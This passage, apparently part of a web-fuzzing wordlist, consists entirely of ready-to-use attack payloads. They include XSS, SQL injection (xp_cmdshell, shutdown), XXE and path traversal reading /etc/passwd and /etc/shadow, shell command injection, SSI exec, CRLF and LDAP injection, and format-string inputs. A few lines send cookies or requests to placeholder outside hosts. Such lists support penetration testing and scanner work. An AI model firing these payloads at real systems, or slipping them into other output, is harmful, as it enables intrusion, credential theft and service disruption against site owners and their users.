SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>\n<xml ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></xml><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\n<xml SRC=\"xsstest.xml\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\n<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>\n\n'\n'--\n' or 1=1--\n1 or 1=1--\n' or 1 in (@@version)--\n1 or 1 in (@@version)--\n'; waitfor delay '0:30:0'--\n1; waitfor delay '0:30:0'--\n'||Utl_Http.request('http://<yourservername>') from dual--\n1||Utl_Http.request('http://<yourservername>') from dual--\nxsstest\nxsstest%00\"<>'\n</foo>\n<foo></foo>\n))))))))))\n../../../../../../../../../../boot.ini\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n../../../../../../../../../../windows/win.ini\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini\n|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &\n| ping -i 30 127.0.0.1 |\n| ping -n 30 127.0.0.1 |\n& ping -i 30 127.0.0.1 &\n& ping -n 30 127.0.0.1 &\n; ping 127.0.0.1 ;\n%0a ping -i 30 127.0.0.1 %0a\n`ping 127.0.0.1`\n;echo 111111\necho 111111\nresponse.write 111111\n:response.write 111111\nhttp://<yourservername>/\n<youremail>%0aCc:<youremail>\n<youremail>%0d%0aCc:<youremail>\n<youremail>%0aBcc:<youremail>\n<youremail>%0d%0aBcc:<youremail>\n%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a\n%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a\n# known cross platform source Code, file disclosure attack patterns - append after file or dir path\n%70\n.%E2%73%70\n%2e0\n%2e\n.\n\\\n?*\n%20\n%00\n%2f\n%5c\ncount(/child::node())\nx' or name()='username' or 'x'='y\n<![CDATA[<script>var n=0;while(true){n++;}</script>]]>\n<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file://c:/boot.ini\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/passwd\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/shadow\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////dev/random\"\">]><foo>&xxe;</foo>\"\n\"<xml ID=I><X><C><![CDATA[<IMG SRC=\"\"javas]]><![CDATA[cript:alert('XSS');\"\">]]>\"\n\"<xml ID=\"\"xss\"\"><I><B><IMG SRC=\"\"javas<!-- -->cript:alert('XSS')\"\"></B></I></xml><SPAN DATASRC=\"\"#xss\"\" DATAFLD=\"\"B\"\" DATAFORMATAS=\"\"HTML\"\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"\n\"<xml SRC=\"\"xsstest.xml\"\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"\n\"<HTML xmlns:xss><?import namespace=\"\"xss\"\" implementation=\"\"http://ha.ckers.org/xss.htc\"\"><xss:xss>XSS</xss:xss></HTML>\"\n%00\nNULL\nnull\n'\n\"\n;\n<!\n-\n=\n+\n\"\n&\n!\n|\n<\n>\n\"><script>alert(1)</script>\n%0d\n%0a\n%7f\n%ff\n-1\nother\n%s%p%x%d\n%99999999999s\n%08x\n%20d\n%20n\n%20x\n%20s\n%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d \n%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i\n%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o\n%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u\n%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x\n%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X\n%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a\n%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A\n%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e\n%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E\n%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f\n%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F\n%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g\n%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G\n%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s\n%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p\n%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%\nXXXXX.%p\nXXXXX`perl -e 'print \".%p\" x 80'`\n`perl -e 'print \".%p\" x 80'`%n\n!\n!'\n!@#$%%^#$%#$@#$%$$@#$%^^**(()\n!@#0%^#0##018387@#0^^**(()\n\"\n\" or \"a\"=\"a\n\" or \"x\"=\"x\n\" or 0=0 #\n\" or 0=0 --\n\" or 1=1 or \"\"=\"\n\" or 1=1--\n\"' or 1 --'\"\n\") or (\"a\"=\"a\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////dev/random\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/passwd\"\">]><foo>&xxe;</foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\"\n\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\"\n\"<HTML xmlns:xss><?import namespace=\"\"xss\"\" implementation=\"\"http://ha.ckers.org/xss.htc\"\"><xss:xss>XSS</xss:xss></HTML>\"\n\"<xml ID=\"\"xss\"\"><I><B><IMG SRC=\"\"javas<!-- -->cript:alert('XSS')\"\"></B></I></xml><SPAN DATASRC=\"\"#xss\"\" DATAFLD=\"\"B\"\" DATAFORMATAS=\"\"HTML\"\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"\n\"<xml ID=I><X><C><![CDATA[<IMG SRC=\"\"javas]]><![CDATA[cript:alert('XSS');\"\">]]>\"\n\"><script>\"\n\"><script>alert(1)</script>\n\"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>\n\">xxx<P>yyy\n\"\\t\"\n#\n#&apos;\n#'\n#xA\n#xA#xD\n#xD\n#xD#xA\n$NULL\n$null\n%\n%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%\n%00\n%00../../../../../../etc/passwd\n%00../../../../../../etc/shadow\n%00/\n%00/etc/passwd%00\n%01%02%03%04%0a%0d%0aADSF\n%08x\n%0A/usr/bin/id\n%0A/usr/bin/id%0A\n%0Aid\n%0Aid%0A\n%0a ping -i 30 127.0.0.1 %0a\n%oa ping -n 30 127.0.0.1 %0a\n%0a id %0a\n%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a\n%0d\n%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a\n%0d%0aX-Injection-Header:%20AttackValue\n%20\n%20$(sleep%2050)\n%20'sleep%2050'\n%20d\n%20n\n%20s\n%20x\n%20|\n%21\n%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E\n%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t\t25%5c..%25%5c..%255cboot.ini\n%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t25%5c..%25%5c..%00\n%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00\n%2500\n%250a\n%26\n%27%20or%201=1\n%28\n%29\n%2A\n%2A%28%7C%28mail%3D%2A%29%29\n%2A%28%7C%28objectclass%3D%2A%29%29\n%2A%7C\n%2C\n%2e%2e%2f\n%3C\n%3C%3F\n%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E\n%3cscript%3ealert(\"XSS\");%3c/script%3e\n%3cscript%3ealert(document.cookie);%3c%2fscript%3e\n%5C\n%5C/\n%60\n%7C\n%7f\n%99999999999s\n%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A\n%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E\n%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F\n%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G\n%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X\n%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a\n%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d \n%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e\n%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f\n%ff\n%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g\n%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i\n%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o\n%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p\n%s%p%x%d\n%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s\n%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u\n%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x\n&\n& id\n& ping -i 30 127.0.0.1 &\n& ping -n 30 127.0.0.1 &\n&#0000060\n&#0000060;\n&#000060\n&#000060;\n&#00060\n&#00060;\n&#0060\n&#0060;\n&#060\n&#060;\n&#10;\n&#10;&#13;\n&#13;\n&#13;&#10;\n&#60\n&#60;\n&#X000003C\n&#X000003C;\n&#X000003c\n&#X000003c;\n&#X00003C\n&#X00003C;\n&#X00003c\n&#X00003c;\n&#X0003C\n&#X0003C;\n&#X0003c\n&#X0003c;\n&#X003C\n&#X003C;\n&#X003c\n&#X003c;\n&#X03C\n&#X03C;\n&#X03c\n&#X03c;\n&#X3C\n&#X3C;\n&#X3c\n&#X3c;\n&#x000003C\n&#x000003C;\n&#x000003c\n&#x000003c;\n&#x00003C\n&#x00003C;\n&#x00003c\n&#x00003c;\n&#x0003C\n&#x0003C;\n&#x0003c\n&#x0003c;\n&#x003C\n&#x003C;\n&#x003c\n&#x003c;\n&#x03C\n&#x03C;\n&#x03c\n&#x03c;\n&#x3C\n&#x3C;\n&#x3c\n&#x3c;\n&LT\n&LT;\n&apos;\n&apos;%20OR\n&id\n&lt\n&lt;\n&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;\n&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;\n&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;\n&lt;&gt;&quot;'%;)(&amp;+\n&ltscript&gtalert(document.cookie);&ltscript&gtalert\n&ltscript&gtalert(document.cookie);</script>\n&quot;;id&quot;\n'\n' (select top 1\n' --\n' ;\n' UNION ALL SELECT\n' UNION SELECT\n' or ''='\n' or '1'='1\n' or '1'='1'--\n' or 'x'='x\n' or (EXISTS)\n' or 0=0 #\n' or 0=0 --\n' or 1 in (@@version)--\n' or 1=1 or ''='\n' or 1=1--\n' or a=a--\n' or uid like '%\n' or uname like '%\n' or user like '%\n' or userid like '%\n' or username like '%\n'%20or%201=1\n'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E\n'';!--\"<XSS>=&{()}\n') or ('a'='a\n'--\n'; exec master..xp_cmdshell\n'; exec xp_regread\n'; waitfor delay '0:30:0'--\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}\n';shutdown--\n'><script>alert(document.cookie);</script>\n'><script>alert(document.cookie)</script>\n'hi' or 'x'='x';\n'or select *\n'sqlattempt1\n'||UTL_HTTP.REQUEST\n'||Utl_Http.request('http://<yourservername>') from dual--\n(\n(')\n(sqlattempt2)\n)\n))))))))))\n*\n*&apos;\n*'\n*(|(mail=*))\n*(|(objectclass=*))\n*/*\n*|\n+\n+%00\n,@variable\n-\n--\n--';\n--sp_password\n-1\n-1.0\n-2\n-20\n-268435455\n..%%35%63\n..%%35c\n..%25%35%63\n..%255c\n..%5c\n..%bg%qf\n..%c0%af\n..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini\n..%u2215\n..%u2216\n../\n../../../../../../../../../../../../etc/hosts\n../../../../../../../../../../../../etc/hosts%00\n../../../../../../../../../../../../etc/passwd\n../../../../../../../../../../../../etc/passwd%00\n../../../../../../../../../../../../etc/shadow\n../../../../../../../../../../../../etc/shadow%00\n..\\\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00\n.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd\n.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/shadow\n/\n/%00/\n/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00\n/%2A\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\n/&apos;\n/'\n/,%ENV,/\n/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd\n/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow\n/.../.../.../.../.../\n/../../../../../../../../%2A\n/../../../../../../../../../../../etc/passwd%00.html\n/../../../../../../../../../../../etc/passwd%00.jpg\n/../../../../../../../../../../etc/passwd\n/../../../../../../../../../../etc/passwd^^\n/../../../../../../../../../../etc/shadow\n/../../../../../../../../../../etc/shadow^^\n/../../../../../../../../bin/id|\n/..\\../..\\../..\\../..\\../..\\../..\\../boot.ini\n/..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd\n/..\\../..\\../..\\../..\\../..\\../..\\../etc/shadow\n/./././././././././././etc/passwd\n/./././././././././././etc/shadow\n//\n//*\n/etc/passwd\n/etc/shadow\n/index.html|id|\n0\n0 or 1=1\n00\n0xfffffff\n1\n1 or 1 in (@@version)--\n1 or 1=1--\n1.0\n1; waitfor delay '0:30:0'--\n1;SELECT%20*\n1||Utl_Http.request('http://<yourservername>') from dual--\n2\n2147483647\n268435455\n65536\n:response.write 111111\n;\n; ping 127.0.0.1 ;\n;/usr/bin/id\\n\n;echo 111111\n;id\n;id;\n;id\\n\n;id|\n;ls -la\n;system('/usr/bin/id')\n;system('cat%20/etc/passwd')\n;system('id')\n;|/usr/bin/id|\n<\n<  script > < / script>\n<!\n<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>\n<![CDATA[<script>var n=0;while(true){n++;}</script>]]>\n</foo>\n<<\n<<<\n<<script>alert(\"XSS\");//<</script>\n<>\"'%;)(&+\n<?\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]><foo>&xxe;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/passwd\">]><foo>&xxe;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/shadow\">]><foo>&xxe;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xxe;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\n<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n<IMG DYNSRC=\"javascript:alert('XSS')\">\n<IMG LOWSRC=\"javascript:alert('XSS')\">\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<IMG SRC=\"jav\tascript:alert('XSS');\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\n<IMG SRC=\"javascript:alert('XSS')\"\n<IMG SRC=\"javascript:alert('XSS');\">\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG SRC=JaVaScRiPt:alert('XSS')>\n<IMG SRC=`javascript:alert(\"'XSS'\")`>\n<IMG SRC=javascript:alert(&quot;XSS&quot;)>\n<IMG SRC=javascript:alert('XSS')>\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>\n<IMG%20SRC='javasc\tript:alert(document.cookie)'>\n<IMG%20SRC='javascript:alert(document.cookie)'>\n<foo></foo>\n<name>','')); phpinfo(); exit;/*</name>\n<script>alert(\"XSS\")</script>\n<script>alert(document.cookie)</script>\n<xml ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></xml><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\n<xml ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>\n<xml SRC=\"xsstest.xml\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\n<xss><script>alert('XSS')</script></vulnerable>\n<youremail>%0aBcc:<youremail>\n<youremail>%0aCc:<youremail>\n<youremail>%0d%0aBcc:<youremail>\n<youremail>%0d%0aCc:<youremail>\n=\n='\n=--\n=;\n>\n?x=\n?x=\"\n?x=>\n?x=|\n@&apos;\n@'\n@*\n@variable\nA\nABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|\nFALSE\nNULL\nPRINT\nPRINT @@variable\nTRUE\nXXXXX.%p\nXXXXX`perl -e 'print \".%p\" x 80'`\n[&apos;]\n[']\n\\\n\\\";alert('XSS');//\n\\\"blah\n\\&apos;\n\\'\n\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd\n\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00\n\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow\n\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00\n\\0\n\\00\n\\00\\00\n\\00\\00\\00\n\\0\\0\n\\0\\0\\0\n\\\\\n\\\\&apos;/bin/cat%20/etc/passwd\\\\&apos;\n\\\\&apos;/bin/cat%20/etc/shadow\\\\&apos;\n\\\\/\n\\\\\\\\*\n\\\\\\\\?\\\\\n\\n/bin/ls -al\\n\n\\n/usr/bin/id;\n\\n/usr/bin/id\\n\n\\n/usr/bin/id|\n\\nid;\n\\nid\\n\n\\nid|\n\\nnetstat -a%\\n\n\\t\n\\u003C\n\\u003c\n\\x23\n\\x27\n\\x27UNION SELECT\n\\x27\\x4F\\x52 SELECT *\n\\x27\\x6F\\x72 SELECT *\n\\x3C\n\\x3D \\x27\n\\x3D \\x3B'\n\\x3c\n^&apos;\n^'\n`\n`/usr/bin/id`\n`dir`\n`id`\n`perl -e 'print \".%p\" x 80'`%n\n`ping 127.0.0.1`\na);/usr/bin/id\na);/usr/bin/id;\na);/usr/bin/id|\na);id\na);id;\na);id|\na)|/usr/bin/id\na)|/usr/bin/id;\na)|id\na)|id;\na;/usr/bin/id\na;/usr/bin/id;\na;/usr/bin/id|\na;id\na;id;\na;id|\nhttp://<yourservername>/\nid%00\nid%00|\ninsert\nlike\nlimit\nnull\nor\nor 0=0 #\nor 0=0 --\nor 1=1--\nor%201=1\nor%201=1 --\nresponse.write 111111\nsomething%00html\nupdate\nx' or 1=1 or 'x'='y\nx' or name()='username' or 'x'='y\nxsstest\nxsstest%00\"<>'\n{&apos;}\n|/usr/bin/id\n|/usr/bin/id|\n|id\n|id;\n|id|\n|ls\n|ls -la\n|nid\\n\n|usr/bin/id\\n\n||\n|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &\n||/usr/bin/id;\n||/usr/bin/id|\n}<div id=\"1\"><form id=\"test\"></form><button form=\"test\" 